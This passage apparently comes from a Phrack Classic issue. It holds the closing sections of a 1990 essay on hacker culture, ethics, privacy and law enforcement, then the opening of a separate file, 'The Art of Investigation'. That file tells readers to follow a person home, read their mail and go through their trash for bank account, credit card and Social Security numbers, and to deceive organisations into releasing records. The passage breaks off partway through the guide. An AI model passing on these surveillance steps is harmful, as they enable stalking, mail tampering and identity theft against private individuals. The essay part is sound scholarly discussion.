Huebner, a hacker in Germany who goes by the name Pengo, wrote in
a note to the RISKS Forum (Huebner89) : ``I was just interested in
computers, not in the data which has been kept on their disks. As
I was going to school at that time, I didn't even have the money
to buy my own computer. Since CP/M (which was the most sophisticated
OS I could use on machines which I had legal access to) didn't turn
me on anymore, I enjoyed the lax security of the systems I had access
to by using X.25 networks. You might point out that I should have
been patient and waited until I could go to the university and
use their machines. Some of you might understand that waiting was
just not the thing I was keen on in those days.''
Brian Harvey, in his position paper (Harvey86) for the ACM Panel on
Hacking, claims that the computer medium available to students, e.g.,
BASIC and floppy disks, is inadequate for challenging intellectual
work. His recommendation is that students be given access to real
computing power, and that they be taught how to use that power
responsibly. He describes a program he created at a public high school
in Massachusetts during the period 1979-1982. They installed a
PDP-11/70 and let students and teachers carry out the administration
of the system. Harvey assessed that putting the burden of dealing
with the problems of malicious users on the students themselves was
a powerful educational force. He also noted that the students who
had the skill and interest to be password hackers were discouraged
from this activity because they also wanted to keep the trust of
their colleagues in order that they could acquire ``superuser'' status
on the system.
Harvey also makes an interesting analogy between teaching computing
and teaching karate. In karate instruction, students are introduced
to the real, adult community. They are given access to a powerful,
deadly weapon, and at the same time are taught discipline and
responsibility. Harvey speculates that the reason that students
do not misuse their power is that they know they are being trusted
with something important, and they want to live up to that trust.
Harvey applied this principle when he set up the school system.
The ACM panel endorsed Harvey's recommendation, proposing a
three-tiered computing environment with local, district-wide, and
nation-wide networks. They recommended that computer professionals
participate in this effort as mentors and role models. They also
recommended that government and industry be encouraged to establish
regional computing centers using donated or re-cycled equipment;
that students be apprenticed to local companies either part-time
on a continuing basis or on a periodic basis; and, following a
suggestion from Felsenstein (Felsenstein86) for a ``Hacker's League,''
that a league analogous to the Amateur Radio Relay League be
established to make contributed resources available for educational
purposes.
Drake said he liked these recommendations. He said that if hackers
were given access to powerful systems through a public account system,
they would supervise themselves. He also suggested that Computer
Resource Centers be established in low-income areas in order to help
the poor get access to information. Perhaps hackers could help run
the centers and teach the members of the community how to use the
facilities. One of my colleagues suggested cynically that the hackers
would only use this to teach the poor how to hack rich people's
systems. A hacker responded by saying this was ridiculous; hackers
would not teach people how to break into systems, but rather how
to use computers effectively and not be afraid of them.
In addition, the hackers I spoke with who had given up illegal
activities said they stopped doing so when they got engaged in other
work.
Geoff Goodfellow and Richard Stallman have reported that they have
given hackers accounts on systems that they manage, and that the
hackers have not misused the trust granted to them. Perhaps
universities could consider providing accounts to pre-college students
on the basis of recommendations from their teachers or parents.
The students might be challenged to work on the same homework problems
assigned in courses or to explore their own interests. Students
who strongly dislike the inflexibility of classroom learning might
excel in an environment that allows them to learn on their own, in
much the way that hackers have done.
4. Thrill, Excitement, and Challenge
One hacker wrote that ``Hackers understand something basic about
computers, and that is that they can be enjoyed. I know none who
hack for money, or hack to frighten the company, or hack for anything
but fun.''
In the words of another hacker, ``Hacking was the ultimate cerebral
buzz for me. I would come home from another dull day at school,
turn my computer on, and become a member of the hacker elite. It
was a whole different world where there were no condescending adults
and you were judged only by your talent. I would first check in
to the private Bulletin Boards where other people who were like me
would hang out, see what the news was in the community, and trade
some info with people across the country. Then I would start actually
hacking. My brain would be going a million miles an hour and I'd
basically completely forget about my body as I would jump from one
computer to another trying to find a path into my target. It was
the rush of working on a puzzle coupled with the high of discovery
many magnitudes intensified. To go along with the adrenaline rush
was the illicit thrill of doing something illegal. Every step I made
could be the one that would bring the authorities crashing down on
me. I was on the edge of technology and exploring past it, spelunking
into electronic caves where I wasn't supposed to be.''
The other hackers I spoke with made similar statements about the
fun and challenge of hacking. In SPIN magazine (Dibbel90), reporter
Julian Dibbell speculated that much of the thrill comes from the
dangers associated with the activity, writing that ``the technology
just lends itself to cloak-and-dagger drama,'' and that ``hackers
were already living in a world in which covert action was nothing
more than a game children played.''
Eric Corley (Corley89) characterizes hacking as an evolved form of
mountain climbing. In describing an effort to construct a list of
active mailboxes on a Voice Messaging System, he writes ``I suppose
the main reason I'm wasting my time pushing all these buttons is
simply so that I can make a list of something that I'm not supposed
to have and be the first person to accomplish this.'' He said that
he was not interested in obtaining an account of his own on the system.
Gordon Meyer says he found this to be a recurring theme: ``We aren't
supposed to be able to do this, but we can'' -- so they do.
One hacker said he was now working on anti-viral programming. He
said it was almost as much fun as breaking into systems, and that
it was an intellectual battle against the virus author.
5. Ethics and Avoiding Damage
All of the hackers I spoke with said that malicious hacking was morally
wrong. They said that most hackers are not intentionally malicious,
and that they themselves are concerned about causing accidental
damage. When I asked Drake about the responsibility of a person
with a PC and modem, his reply included not erasing or modifying
anyone else's data, and not causing a legitimate user on a system
any problems. Hackers say they are outraged when other hackers cause
damage or use resources that would be missed, even if the results
are unintentional and due to incompetence. One hacker wrote ``I
have ALWAYS strived to do NO damage, and to inconvenience as few people
as possible. I NEVER, EVER, EVER DELETE A FILE. One of the first
commands I do on a new system is disable the delete file command.''
Some hackers say that it is unethical to give passwords and similar
security-related information to persons who might do damage. In
the recent incident where a hacker broke into Bell South and downloaded
a text file on the emergency 911 service, hackers say that there
was no intention to use this knowledge to break into or sabotage
the 911 system. According to Emmanuel Goldstein (Goldstein90), the
file did not even contain information about how to break into the
911 system.
The hackers also said that some break-ins were unethical, e.g.,
breaking into hospital systems, and that it is wrong to read
confidential information about individuals or steal classified
information. All said it was wrong to commit fraud for personal
profit.
Although we as computer security professionals often disagree with
hackers about what constitutes damage, the ethical standards listed
here sound much like our own. Where the hackers' ethics differ from
the standards adopted by most in the computer security community
is that hackers say it is not unethical to break into many systems,
use idle computer and communications resources, and download system
files in order to learn. Goldstein says that hacking is not wrong:
it is not the same as stealing, and uncovers design flaws and security
deficiencies (Goldstein89).
Brian Reid, a colleague at Digital who has spoken with many hackers,
speculates that a hacker's ethics may come from not being raised
properly as a civilized member of society, and not appreciating the
rules of living in society. One hacker responded to this with ``What
does `being brought up properly' mean? Some would say that it is
`good' to keep to yourself, mind your own business. Others might
argue that it is healthy to explore, take risks, be curious and
discover.'' Brian Harvey (Harvey86) notes that many hackers are
adolescents, and that adolescents are at a less advanced stage of
moral development than adults, where they might not see how the effects
of their actions hurt others. Larry Martin (Martin89) claims that
parents, teachers, the press, and others in society are not aware
of their responsibility to contribute to instilling ethical values
associated with computer use. This could be the consequence of the
youth of the computing field; many people are still computer illiterate
and cultural norms may be lagging behind advances in technology and
the growing dependency on that technology by businesses and society.
Hollinger and Lanza-Kaduce (HollingerLanza-Kaduce88) speculate that
the cultural normative messages about the use and abuse of computer
technology have been driven by the adoption of criminal laws in the
last decade. They also speculate that hacking may be encouraged
during the process of becoming computer literate. Some of my
colleagues say that hackers are irresponsible. One hacker responded
``I think it's a strong indication of the amount of responsibility
shown that so FEW actually DAMAGING incidents are known.''
But we must not overlook that the differences in ethics also reflect
a difference in philosophy about information and information handling
resources; whereas hackers advocate sharing, we seem to be advocating
ownership as property. The differences also represent an opportunity
to examine our own ethical behavior and our practices for information
sharing and protection. For example, one hacker wrote ``I will accept
that it is morally wrong to copy some proprietary software, however,
I think that it is morally wrong to charge $6000 for a program that
is only around 25K long.'' Hence, I shall go into a few of the ethical
points raised by hackers more closely. It is not a simple case of
good or mature (us) against bad or immature (hackers), or of teaching
hackers a list of rules.
Many computer professionals such as Martin (Martin89) argue the moral
questions by analogy. The analogies are then used to justify their
judgment of a hacker's actions as unethical. Breaking into a system
is compared with breaking into a house, and downloading information
and using computer and telecommunications services is compared with
stealing tangible goods. But, say hackers, the situations are not
the same. When someone breaks into a house, the objective is to
steal goods, which are often irreplaceable, and property is often
damaged in the process. By contrast, when a hacker breaks into a
system, the objective is to learn and avoid causing damage. Downloaded
information is copied, not stolen, and still exists on the original
system. Moreover, as noted earlier, information has not been
traditionally regarded as property. Dibbel (Dibbel90) says that
when the software industries and phone companies claim losses of
billions of dollars to piracy, they are not talking about goods that
disappear from the shelves and could have been sold.
We often say that breaking into a system implies a lack of caring
for the system's owner and authorized users. But, one hacker says
that the ease of breaking into a system reveals a lack of caring
on the part of the system manager to protect user and company assets,
or failure on the part of vendors to warn managers about the
vulnerabilities of their systems. He estimated his success rate
of getting in at 10-15%, and that is without spending more than an
hour on any one target system. Another hacker says that he sees
messages from vendors notifying the managers, but that the managers
fail to take action.
Richard Pethia of CERT (Computer Emergency Response Team) reports
that they seldom see cases of malicious damage caused by hackers,
but that the break-ins are nevertheless disruptive because system
users and administrators want to be sure that nothing was damaged.
(CERT suggests that sites reload system software from secure backups
and change all user passwords in order to protect against possible
back doors and Trojan Horses that might have been planted by the
hacker. Pethia also noted that prosecutors are generally called
for government sites, and are being called for non-government sites
with increasing frequency.) Pethia says that break-ins also generate
a loss of trust in the computing environment, and may lead to adoption
of new policies that are formulated in a panic or management edicts
that severely restrict connectivity to outside systems. Brian Harvey
says that hackers cause damage by increasing the amount of paranoia,
which in turn leads to tighter security controls that diminish the
quality of life for the users. Hackers respond to these points by
saying they are the scapegoats for systems that are not adequately
protected. They say that the paranoia is generated by ill-founded
fears and media distortions (I will return to this point later),
and that security need not be oppressive to keep hackers out; it
is mainly making sure that passwords and system defaults are
well chosen.
Pethia says that some intruders seem to be disruptive to prove a
point, such as that the systems are vulnerable, the security personnel
are incompetent, or ``it's not nice to say bad things about hackers.''
In the N.Y. Times, John Markoff (Markoff90) wrote that the hacker
who claimed to have broken into Cliff Stoll's system said he was
upset by Stoll's portrayal of hackers in ``The Cuckoo's Egg''
(Stoll90). Markoff reported that the caller said: ``He (Stoll)
was going on about how he hates all hackers, and he gave pretty much
of a one-sided view of who hackers are.''
``The Cuckoo's Egg'' captures many of the popular stereotypes of
hackers. Criminologist Jim Thomas criticizes it for presenting a
simplified view of the world, one where everything springs from the
forces of light (us) or of darkness (hackers) (Thomas90). He claims
that Stoll fails to see the similarities between his own activities
(e.g., monitoring communications, ``borrowing'' monitors without
authorization, shutting off network access without warning, and lying
to get information he wants) and those of hackers. He points out
Stoll's use of pejorative words such as ``varmint'' to describe
hackers, and Stoll's quote of a colleague: ``They're technically
skilled but ethically bankrupt programmers without any respect for
others' work -- or privacy. They're not destroying one or two
programs. They're trying to wreck the cooperation that builds our
networks,'' (Stoll90, p. 159). Thomas writes ``at an intellectual
level, it (Stoll's book) provides a persuasive, but simplistic, moral
imagery of the nature of right and wrong, and provides what -- to
a lay reader -- would seem a compelling justification for more statutes
and severe penalties against the computer underground. This is
troublesome for two reasons. First, it leads to a mentality of social
control by law enforcement during a social phase when some would
argue we are already over-controlled. Second, it invokes a punishment
model that assumes we can stamp out behaviors to which we object
if only we apprehend and convict a sufficient number of violators.
... There is little evidence that punishment will in the long run
reduce any given offense, and the research of Gordon Meyer and I
suggests that criminalization may, in fact, contribute to the growth
of the computer underground.''
6. Public Image and Treatment
Hackers express concern about their negative public image and
identity. As noted earlier, hackers are often portrayed as being
irresponsible and immoral. One hacker said that ``government
propaganda is spreading an image of our being at best, sub-human,
depraved, criminally inclined, morally corrupt, low life. We need
to prove that the activities that we are accused of (crashing systems,
interfering with life support equipment, robbing banks, and jamming
911 lines) are as morally abhorrent to us as they are to the general
public.''
The public identity of an individual or group is generated in part
by the actions of the group interacting with the standards of the
community observing those actions. What then accounts for the
difference between the hacker's public image and what they say about
themselves? One explanation may be the different standards. Outside
the hacking community, the simple act of breaking into systems is
regarded as unethical by many. The use of pejorative words like
``vandal'' and ``varmint'' reflect this discrepency in ethics. Even
the word ``criminal'' carries with it connotations of someone evil;
hackers say they are not criminal in this sense. Katie Hafner notes
that Robert Morris Jr., who was convicted of launching the Internet
worm, was likened to a terrorist even though the worm did not destroy
data (Hafner90)
Distortions of events and references to potential threats also create
an image of persons who are dangerous. Regarding the 911 incident
where a hacker downloaded a file from Bell South, Goldstein reported
``Quickly, headlines screamed that hackers had broken into the 911
system and were interfering with emergency telephone calls to the
police. One newspaper report said there were no indications that
anyone had died or been injured as a result of the intrusions. What
a relief. Too bad it wasn't true,'' (Goldstein90). In fact, the
hackers involved with the 911 text file had not broken into the 911
system. The dollar losses attributed to hacking incidents also are
often highly inflated.
Thomas and Meyer (ThomasMeyer90) say that the rhetoric depicting
hackers as a dangerous evil contributes to a ``witch hunt'' mentality,
wherein a group is first labeled as dangerous, and then enforcement
agents are mobilized to exorcise the alleged social evil. They see
the current sweeps against hackers as part of a reaction to a broader
fear of change, rather than to the actual crimes committed.
Hackers say they are particularly concerned that computer security
professionals and system managers do not appear to understand hackers
or be interested in their concerns. Hackers say that system managers
treat them like enemies and criminals, rather than as potential helpers
in their task of making their systems secure. This may reflect
managers' fears about hackers, as well as their responsibilities
to protect the information on their systems. Stallman says that
the strangers he encounters using his account are more likely to
have a chip on their shoulder than in the past; he attributes this
to a harsh enforcer mentality adopted by the establishment. He says
that network system managers start out with too little trust and
a hostile attitude toward strangers that few of the strangers deserve.
One hacker said that system managers show a lack of openness to those
who want to learn.
Stallman also says that the laws make the hacker scared to communicate
with anyone even slightly ``official,'' because that person might
try to track the hacker down and have him or her arrested. Drake
raised the issue of whether the laws could differentiate between
malicious and nonmalicious hacking, in support of a ``kinder, gentler''
relationship between hackers and computer security people. In fact,
many states such as California initially passed computer crime laws
that excluded malicious hacking; it was only later that these laws
were amended to include nonmalicious actions (HollingerLanza-Kaduce88).
Hollinger and Lanza-Kaduce speculate that these amendments and other
new laws were catalyzed mainly by media events, especially the reports
on the ``414 hackers'' and the movie ``War Games,'' which created
a perception of hacking as extremely dangerous, even if that perception
was not based on facts.
Hackers say they want to help system managers make their systems
more secure. They would like managers to recognize and use their
knowledge about system vulnerabilities. Landreth (Landreth89)
suggests ways in which system managers can approach hackers in order
to turn them into colleagues, and Goodfellow also suggests befriending
hackers (Goodfellow83). John Draper (Cap'n Crunch) says it would
help if system managers and the operators of phone companies and
switches could cooperate in tracing a hacker without bringing in
law enforcement authorities.
Drake suggests giving hackers free access in exchange for helping
with security, a suggestion that I also heard from several hackers.
Drake says that the current attitude of treating hackers as enemies
is not very conducive to a solution, and by belittling them, we only
cause ourselves problems.
I asked some of the hackers whether they'd be interested in breaking
into systems if the rules of the ``game'' were changed so that instead
of being threatened by prosecution, they were invited to leave a
``calling card'' giving their name, phone number, and method of
breaking in. In exchange, they would get recognition and points
for each vulnerability they discovered. Most were interested in
playing; one hacker said he would prefer monetary reward since he
was supporting himself. Any system manager interested in trying
this out could post a welcome message inviting hackers to leave their
cards. This approach could have the advantage of not only letting
the hackers contribute to the security of the system, but of allowing
the managers to quickly recognize the potentially malicious hackers,
since they are unlikely to leave their cards. Perhaps if hackers
are given the opportunity to make contributions outside the
underground, this will dampen their desire to pursue illegal activities.
Several hackers said that they would like to be able to pursue their
activities legally and for income. They like breaking into systems,
doing research on computer security, and figuring out how to protect
against vulnerabilities. They say they would like to be in a position
where they have permission to hack systems. Goodfellow suggests
hiring hackers to work on tiger teams that are commissioned to locate
vulnerabilities in systems through penetration testing. Baird
Info-Systems Safeguards, Inc., a security consulting firm, reports
that they have employed hackers on several assignments (Baird87).
They say the hackers did not violate their trust or the trust of
their clients, and performed in an outstanding manner. Baird believes
that system vulnerabilities can be better identified by employing
people who have exploited systems.
One hacker suggested setting up a clearinghouse that would match
hackers with companies that could use their expertise, while
maintaining anonymity of the hackers and ensuring confidentiality
of all records. Another hacker, in describing an incident where
he discovered a privileged account without a password, said ``What
I (and others) wish for is a way that hackers can give information
like this to a responsible source, AND HAVE HACKERS GIVEN CREDIT
FOR HELPING! As it is, if someone told them that `I'm a hacker, and
I REALLY think you should know...' they would freak out, and run
screaming to the SS (Secret Service) or the FBI. Eventually, the
person who found it would be caught, and hauled away on some crazy
charge. If they could only just ACCEPT that the hacker was trying
to help!'' The clearinghouse could also provide this type of service.
Hackers are also interested in security policy issues. Drake expressed
concern over how we handle information about computer security
vulnerabilities. He argues that it is better to make this information
public than cover it up and pretend that it does not exist, and cites
the CERT to illustrate how this approach can be workable. Other
hackers, however, argue for restricting initial dissemination of
flaws to customers and users. Drake also expressed concern about
the role of the government, particularly the military, in
cryptography. He argues that NSA's opinion on a cryptographic standard
should be taken with a large grain of salt because of their code
breaking role.
Some security specialists are opposed to hiring hackers for security
work, and Eugene Spafford has urged people not to do business with
any company that hires a convicted hacker to work in the security
area (ACM90). He says that ``This is like having a known arsonist
install a fire alarm.'' But, the laws are such that a person can
be convicted for having done nothing other than break into a system;
no serious damage (i.e., no ``computer arson'') is necessary. Many
of our colleagues, including Geoff Goodfellow (Goodfellow83) and
Brian Reid (Frenkel87), admit to having broken into systems in the
past. Reid is quoted as saying that because of the knowledge he gained
breaking into systems as a kid, he was frequently called in to help
catch people who break in. Spafford says that times have changed,
and that this method of entering the field is no longer socially
acceptable, and fails to provide adequate training in computer science
and computer engineering (Spafford89). However, from what I have
observed, many hackers do have considerable knowledge about
telecommunications, data security, operating systems, programming
languages, networks, and cryptography. But, I am not challenging
a policy to hire competent people of sound character. Rather, I
am challenging a strict policy that uses economic pressure to close
a field of activity to all persons convicted of breaking into
systems. It is enough that a company is responsible for the behavior
of its employees. Each hacker can be considered for employment based
on his or her own competency and character.
Some people have called for stricter penalties for hackers, including
prison terms, in order to send a strong deterrent message to hackers.
John Draper, who was incarcerated for his activities in the 1970's,
argues that in practice this will only make the problem worse. He
told me that he was forced under threat to teach other inmates his
knowledge of communications systems. He believes that prison sentences
will serve only to spread hacker's knowledge to career criminals.
He said he was never approached by criminals outside the prison,
but that inside the prison they had control over him.
One hacker said that by clamping down on the hobbyist underground,
we will only be left with the criminal underground. He said that
without hackers to uncover system vulnerabilities, the holes will
be left undiscovered, to be utilized by those likely to cause real
damage.
Goldstein argues that the existing penalties are already way out
of proportion to the acts committed, and that the reason is because
of computers (Goldstein89). He says that if Kevin Mitnick had
committed crimes similar to those he committed but without a computer,
he would have been classified as a mischief maker and maybe fined
$100 for trespassing; instead, he was put in jail without bail
(Goldstein89). Craig Neidorf, a publisher and editor of the electronic
newsletter ``Phrack,'' faces up to 31 years and a fine of $122,000
for receiving, editing, and transmitting the downloaded text file
on the 911 system (Goldstein90). (Since the time I wrote this, a new
indictment was issued with penalties of up to 65 years in prison.
Neidorf went on trial beginning July 23. The trial ended July 27
when the government dropped all charges. DED)
7. Privacy and the First and Fourth Amendments
The hackers I spoke with advocated privacy protection for sensitive
information about individuals. They said they are not interested
in invading people's privacy, and that they limited their hacking
activities to acquiring information about computer systems or how
to break into them. There are, of course, hackers who break into
systems such as the TRW credit database. Emanuel Goldstein argues
that such invasions of privacy took place before the hacker arrived
(Harpers90). Referring to credit reports, government files, motor
vehicle records, and the ``megabytes of data piling up about each
of us,'' he says that thousands of people legally can see and use
this data, much of it erroneous. He claims that the public has been
misinformed about the databases, and that hackers have become
scapegoats for the holes in the systems. One hacker questioned the
practice of storing sensitive personal information on open systems
with dial-up access, the accrual of the information, the methods
used to acquire it, and the purposes to which it is put. Another
hacker questioned the inclusion of religion and race in credit records.
Drake told me that he was concerned about the increasing amount of
information about individuals that is stored in large data banks,
and the inability of the individual to have much control over the
use of that information. He suggests that the individual might be
co-owner of information collected about him or her, with control
over the use of that information. He also says that an individual
should be free to withhold personal information, of course paying
the consequences of doing so (e.g., not getting a drivers license
or credit card). In fact, all Federal Government forms are required
to contain a Privacy Act Statement that states how the information
being collected will be used and, in some cases, giving the option
of withholding the information.
Goldstein has also challenged the practices of law enforcement agencies
in their attempt to crack down on hackers (Goldstein90). He said
that all incoming and outgoing electronic mail used by ``Phrack''
was monitored before the newsletter was shutdown by authorities.
``Had a printed magazine been shut down in this fashion after having
all of their mail opened and read, even the most thick-headed
sensationalist media types would have caught on: hey, isn't that
a violation of the First Amendment?'' He also cites the shutdown
of several bulletin boards as part of Operation Sun Devil, and quotes
the administrator of the bulletin board Zygot as saying ``Should
I start reading my users' mail to make sure they aren't saying anything
naughty? Should I snoop through all the files to make sure everyone
is being good? This whole affair is rather chilling.'' The
administrator for the public system The Point wrote ``Today, there
is no law or precedent which affords me ... the same legal rights
that other common carriers have against prosecution should some other
party (you) use my property (The Point) for illegal activities.
That worries me ...''
About 40 personal computer systems and 23,000 data disks were seized
under Operation Sun Devil, a two-year investigation involving the
FBI, Secret Service, and other federal and local law enforcement
officials. In addition, the Secret Service acknowledges that its
agents, acting as legitimate users, had secretly monitored computer
bulletin boards (Markoff90a). Markoff reports that California
Representative Don Edwards, industry leader Mitchell Kapor, and civil
liberties advocates are alarmed by these government actions, saying
that they challenge freedom of speech under the First Amendment and
protection against searches and seizures under the Fourth Amendment.
Markoff asks: ``Will fear of hackers bring oppression?''
John Barlow writes ``The Secret Service may actually have done a
service for those of us who love liberty. They have provided us
with a devil. And devils, among their other galvanizing virtues,
are just great for clarifying the issues and putting iron in your
spine,'' (Barlow90). Some of the questions that Barlow says need
to be addressed include ``What are data and what is free speech?
How does one treat property which has no physical form and can be
infinitely reproduced? Is a computer the same as a printing press?''
Barlow urges those of us who understand the technology to address
these questions, lest the answers be given to us by law makers and
law enforcers who do not. Barlow and Kapor are constituting a
foundation to ``raise and disburse funds for education, lobbying,
and litigation in the areas relating to digital speech and the
extension of the Constitution into Cyberspace.''
8. Conclusions
Hackers say that it is our social responsibility to share information,
and that it is information hoarding and disinformation that are the
crimes. This ethic of resource and information sharing contrasts
sharply with computer security policies that are based on authorization
and ``need to know.'' This discrepancy raises an interesting question:
Does the hacker ethic reflect a growing force in society that stands
for greater sharing of resources and information -- a reaffirmation
of basic values in our constitution and laws? It is important that
we examine the differences between the standards of hackers, systems
managers, users, and the public. These differences may represent
breakdowns in current practices, and may present new opportunities
to design better policies and mechanisms for making computer resources
and information more widely available.
The sentiment for greater information sharing is not restricted to
hackers. In the best seller, ``Thriving on Chaos,'' Tom Peters
(Peters87) writes about sharing within organizations: ``Information
hoarding, especially by politically motivated, power-seeking staffs,
has been commonplace throughout American industry, service and
manufacturing alike. It will be an impossible millstone around the
neck of tomorrow's organizations. Sharing is a must.'' Peters argues
that information flow and sharing is fundamental to innovation and
competitiveness. On a broader scale, Peter Drucker (Drucker89) says
that the ``control of information by government is no longer possible.
Indeed, information is now transnational. Like money, it has no
`fatherland.' ''
Nor is the sentiment restricted to people outside the computer security
field. Harry DeMaio (DeMaio89) says that our natural urge is to
share information, and that we are suspicious of organizations and
individuals who are secretive. He says that information is exchanged
out of ``want to know'' and mutual accommodation rather than ``need
to know.'' If this is so, then some of our security policies are
out of step with the way people work. Peter Denning (DenningP89)
says that information sharing will be widespread in the emerging
worldwide networks of computers and that we need to focus on ``immune
systems'' that protect against mistakes in our designs and recover
from damage.
I began my investigation of hackers with the question, who are they
and what is their culture and discourse? My investigation uncovered
some of their concerns, which provided the organizational structure
to this paper, and several suggestions for new actions that might
be taken. My investigation also opened up a broader question: What
conflict in society do hackers stand at the battle lines of? Is
it owning or restricting information vs. sharing information -- a
tension between an age-old tradition of controlling information as
property and the Englightenment tradition of sharing and disseminating
information? Is it controlling access based on ``need to know,''
as determined by the information provider, vs. ``want to know,''
as determined by the person desiring access? Is it law enforcement
vs. freedoms granted under the First and Fourth Amendments? The
answers to these questions, as well as those raised by Barlow on
the nature of information and free speech, are important because
they tell us whether our policies and practices serve us as well
as they might. The issue is not simply hackers vs. system managers
or law enforcers; it is a much larger question about values and
practices in an information society.
Acknowledgments
I am deeply grateful to Peter Denning, Frank Drake, Nathan Estey,
Katie Hafner, Brian Harvey, Steve Lipner, Teresa Lunt, Larry Martin,
Gordon Meyer, Donn Parker, Morgan Schweers, Richard Stallman, and
Alex for their comments on earlier versions of this paper and helpful
discussions; to Richard Stallman for putting me in contact with
hackers; John Draper, Geoff Goodfellow, Brian Reid, Eugene Spafford,
Dave, Marcel, Mike, RGB, and the hackers for helpful discussions;
and Richard Pethia for a summary of some of his experiences at CERT.
The opinions expressed here, however, are my own and do not necessarily
represent those of the people mentioned above or of Digital Equipment
Corporation.
References
ACM90
``Just say no,'' Comm. ACM, Vol. 33, No. 5, May 1990, p. 477.
Baird87
Bruce J. Baird, Lindsay L. Baird, Jr., and Ronald P. Ranauro, ``The
Moral Cracker?,'' Computers and Security, Vol. 6, No. 6, Dec. 1987,
p. 471-478.
Barlow90
John Barlow, ``Crime and Puzzlement,'' June 1990, to appear in Whole
Earth Review.
Corley89
Eric Corley, ``The Hacking Fever,'' in Pamela Kane, V.I.R.U.S.
Protection, Bantam Books, New York, 1989, p. 67-72.
DeMaio89
Harry B. DeMaio, ``Information Ethics, a Practical Approach,''
Proc. of the 12th National Computer Security Conference, 1989,
p. 630-633.
DenningP89
Peter J. Denning, ``Worldnet,'' American Scientist, Vol. 77, No. 5,
Sept.-Oct., 1989.
DenningP90
Peter J. Denning, Computers Under Attack, ACM Press, 1990.
Dibbel90
Julian Dibbel, ``Cyber Thrash,'' SPIN, Vol. 5, No. 12, March 1990.
Drucker89
Peter F. Drucker, The New Realities, Harper and Row, New York, 1989.
Felsenstein86
Lee Felsenstein, ``Real Hackers Don't Rob Banks,'' in full report on
ACM Panel on Hacking (Lee86).
Frenkel87
Karen A. Frenkel, ``Brian Reid, A Graphics Tale of a Hacker
Tracker,'' Comm. ACM, Vol. 30, No. 10, Oct. 1987, p. 820-823.
Goldstein89
Emmanuel Goldstein, ``Hackers in Jail,'' 2600 Magazine, Vol. 6, No. 1,
Spring 1989.
Goldstein90
Emmanuel Goldstein, ``For Your Protection,'' 2600 Magazine, Vol. 7,
No. 1, Spring 1990.
Goodfellow83
Geoffrey S. Goodfellow, ``Testimony Before the Subcommittee on
Transportation, Aviation, and Materials on the Subject of
Telecommunications Security and Privacy,'' Sept. 26, 1983.
Hafner90
Katie Hafner, ``Morris Code,'' The New Republic, Feb. 16, 1990,
p. 15-16.
Harpers90
``Is Computer Hacking a Crime?" Harper's, March 1990, p. 45-57.
Harvey86
Brian Harvey, ``Computer Hacking and Ethics,'' in full report on
ACM Panel on Hacking (Lee86).
HollingerLanza-Kaduce88
Richard C. Hollinger and Lonn Lanza-Kaduce, ``The Process of
Criminalization: The Case of Computer Crime Laws,'' Criminology,
Vol. 26, No. 1, 1988, p. 101-126.
Huebner89
Hans Huebner, ``Re: News from the KGB/Wiley Hackers,'' RISKS Digest,
Vol. 8, Issue 37, 1989.
Landreth89
Bill Landreth, Out of the Inner Circle, Tempus, Redmond, WA, 1989.
Lee86
John A. N. Lee, Gerald Segal, and Rosalie Stier, ``Positive
Alternatives: A Report on an ACM Panel on Hacking,'' Comm. ACM,
Vol. 29, No. 4, April 1986, p. 297-299; full report available from
ACM Headquarters, New York.
Levy84
Steven Levy, Hackers, Dell, New York, 1984.
Markoff90
John Markoff, ``Self-Proclaimed `Hacker' Sends Message to Critics,''
The New York Times, March 19, 1990.
Markoff90a
John Markoff, ``Drive to Counter Computer Crime Aims at Invaders,''
The New York Times, June 3, 1990.
Martin89
Larry Martin, ``Unethical `Computer' Behavior: Who is Responsible?,''
Proc. of the 12th National Computer Security Conference, 1989.
Meyer89
Gordon R. Meyer, The Social Organization of the Computer Underground,
Master's thesis, Dept. of Sociology, Northern Illinois Univ., Aug.
1989.
MeyerThomas90
Gordon Meyer and Jim Thomas, ``The Baudy World of the Byte Bandit:
A Postmodernist Interpretation of the Computer Underground,'' Dept.
of Sociology, Northern Illinois Univ., DeKalb, IL, March 1990.
Peters87
Tom Peters, Thriving on Chaos, Harper & Row, New York, Chapter VI, S-3,
p. 610, 1987.
Spafford89
Eugene H. Spafford, ``The Internet Worm, Crisis and Aftermath,''
Comm. ACM, Vol. 32, No. 6, June 1989, p. 678-687.
Stallman84
Richard M. Stallman, Letter to ACM Forum, Comm. ACM, Vol. 27,
No. 1, Jan. 1984, p. 8-9.
Stallman90
Richard M. Stallman, ``Against User Interface Copyright'' to appear
in Comm. ACM.
Steele83
Guy L. Steele, Jr., Donald R. Woods, Raphael A. Finkel, Mark R.
Crispin, Richard M. Stallman, and Geoffrey S. Goodfellow, The
Hacker's Dictionary, Harper & Row, New York, 1983.
Stoll90
Clifford Stoll, The Cuckoo's Egg, Doubleday, 1990.
Thomas90
Jim Thomas, ``Review of The Cuckoo's Egg,'' Computer Underground
Digest, Issue #1.06, April 27, 1990.
ThomasMeyer90
Jim Thomas and Gordon Meyer, ``Joe McCarthy in a Leisure Suit:
(Witch)Hunting for the Computer Underground,'' Unpublished
manuscript, Department of Sociology, Northern Illinois University,
DeKalb, IL, 1990; see also the Computer Underground Digest, Vol.
1, Issue 11, June 16, 1990.
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #4 of 12
***** T H E A R T O F I N V E S T I G A T I O N *****
***** *****
***** *****
***** Brought to You By *****
***** *****
***** The Butler *****
***** *****
***** 10/31/90 *****
***** *****
***** *****
There are many ways to obtain information about individuals. I am going to
cover some of the investigative means of getting the low down on people whom
you wish to know more about.
Some of the areas I will cover are:
Social Security Checks
Driving/Vehicular Records
Police Reports
FBI Records
Insurance Records
Legal Records
Credit Bureau Checks
Probate Records
Real Estate Records
Corporate Records
Freedom Of Information Act
Governmental Agency Records
Maps
Tax Records
To obtain information from some organizations or some individuals one must be
able to "BULLSHIT"!!! Not only by voice but in writing. Many times you must
write certain governmental bodies requesting info and it can only be done in
writing. I can't stress enough the need for proper grammer and spelling.
For you to obtain certain information about another person you must first
get a few KEY pieces of info to make your investigation easier. The persons
Full Name, Social Security Number, Date & Place of Birth will all make your
search easier and more complete.
First of all in most cases you will know the persons name you want to invest-
igate. If not you must obtain it any way you can. First you could follow them
to their home and get their address. Then some other time when they are gone
you could look at their mail or dig through their trash to get their Full Name.
While in their trash you might even be able to dig up more interesting info
like: Bank Accout Numbers, Credit Card Numbers, Social Security Number, Birth
Day, Relatives Names, Long Distance Calls Made, etc.
If you can't get to their trash for some reason take their address to your
local library and check it against the POLKS and COLES Directories. This
should provide you with their Full Name, Phone Number, Address, and how long
they have lived at the current location.
You can also check the Local Phone Book, Directory Assistance, City Directories,
